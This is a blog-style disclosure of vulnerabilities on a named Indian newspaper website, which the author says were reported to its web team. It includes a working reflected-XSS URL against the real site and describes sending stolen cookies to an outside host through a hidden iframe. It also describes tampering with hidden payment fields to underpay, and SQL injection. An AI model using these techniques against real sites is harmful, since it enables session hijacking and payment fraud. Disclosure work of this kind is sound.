Disclaimer: This article carries information about the security vulnerabilities in a leading website. I’m not responsible if anyone tries to exploit these vulnerabilities. This article is written for educational purposes and exploiting such vulnerabilities may invite legal charges levelled against you.  I have already reported the vulnerabilities to the web team . But I have not checked whether they have fixed the issues.

E-commerce is a part of our daily life. I have shared my credit card information with many leading internet service providers like Google, Amazon, Paypal and so on. But can we trust a website simple because of the fact it is very popular? It seems that it would be a bad idea.

Websites like Google and Amazon are internet giants! So they know about the platform and the architecture. Hence while designing a new service, they will always look at the security issues associated. Though, there were security loop holes reported in the case of popular websites like Facebook and MySpace, they responded immediately and fixed the issues.

But what about other popular websites whose primary business is not linked to Internet. Let’s take the case with the websites of leading newspapers. In my personal option, they adopt two ways. In the first case, they create a ‘web team that includes people from editorial team of the paper’ and the another way is to create a kind of ‘support team’ that performs all the internet related activities. The first one is preferred as it is more secure because of the autonomous status it is having.

Let’s perform some basic testing on one of the popular websites based in India – thehindu.com (The website of The Hindu – a national newspaper).

Vulnerable to XSS attack

It is found that thehindu.com is vulnerable to XSS attack. Consider the following example to see the vulnerability in the coding:

If some one sends a email with the following content

Check out this story (+ some blah-blah about the story) in The Hindu:

http://epaper.thehindu.com/svww_searchresult.php?keyword=%3Cscript%20type=%22text/javascript%22%3E%20alert%20%28%27Poor%20coding!%27%29;%20%3C/script%3E

It is likely that people will click on that link since the domain is thehindu.com . If they (users) have already logged into the E-paper site, then this is what they will be seeing

This illustrates the vulnerability. The above URL had a script that simply creates an alert box. You can manipulate the URL further by obfuscating it. One can exploit this by changing the code to get the cookie information by using document.cookie function. Then, he can open an iframe of 0 width and connect to

anothersite.com/userdetails?cookie=var

and pass the cookie information. This means that the attacker can now use the account (actually, ‘the session’) of the legitimate user. This can also be used for creating a frame that collects the actual login details from the user. Hence the attacker can steal that information as well. People won’t suspect as it displayed on top of thehindu.com URL.

This vulnerability can also be exploited for defacing and attacking the site’s reputation. If this issue is fixed, then one cannot perform as malicious stuffs ( as shown below)

Manipulating Financial Details

The website is using a highly insecure way of handling the initiation of the collection of financial details.  This attack is more serious, from a financial point of view.

As you can see here the site is using hidden fields for sending the values.  But it is easy to get this header information and edit the same.

Here, as an example, I’m editing the value 150 INR to just 10 INR and you can see that I am able to make the payment for that amount. And the ‘transaction id’ will remain same so one can use the service by paying less money!

Since the origin of the request is from hindu.com, I don’t think that The Hindu can nullify the transaction or call it invalid because of non-repudiation elements involved in the transaction.

I wonder what will happen if one performs a transaction for ‘ –1 million’

SQL Attacks

The site is also vulnerable to some SQL attacks. As you can see here, when I issued an SQL query, I got all the indexed keywords in the site.

The site can also be attacked from the login page itself for getting the error codes used by the site (a minor issue):

These are some of the issues that I found when I spent few minutes on the site. Now imagine a dedicated attacker with more time to spare!

Tips for Users

• DONOT use the same password (that you use for online banking or accessing your email) in these types of websites
• Always check that the site URL (protocol) starts with https while doing a financial transaction
• Perform the financial transaction only if it is done by a reliable third part gateway (say, that of a bank)

Tips for Website owners

• Use bots for tracking unusual activities
• Always have a dedicated web team
• Use frameworks for delivering the content
• Perform basic security checks before launching it!
• Use Google custom search for searching the pages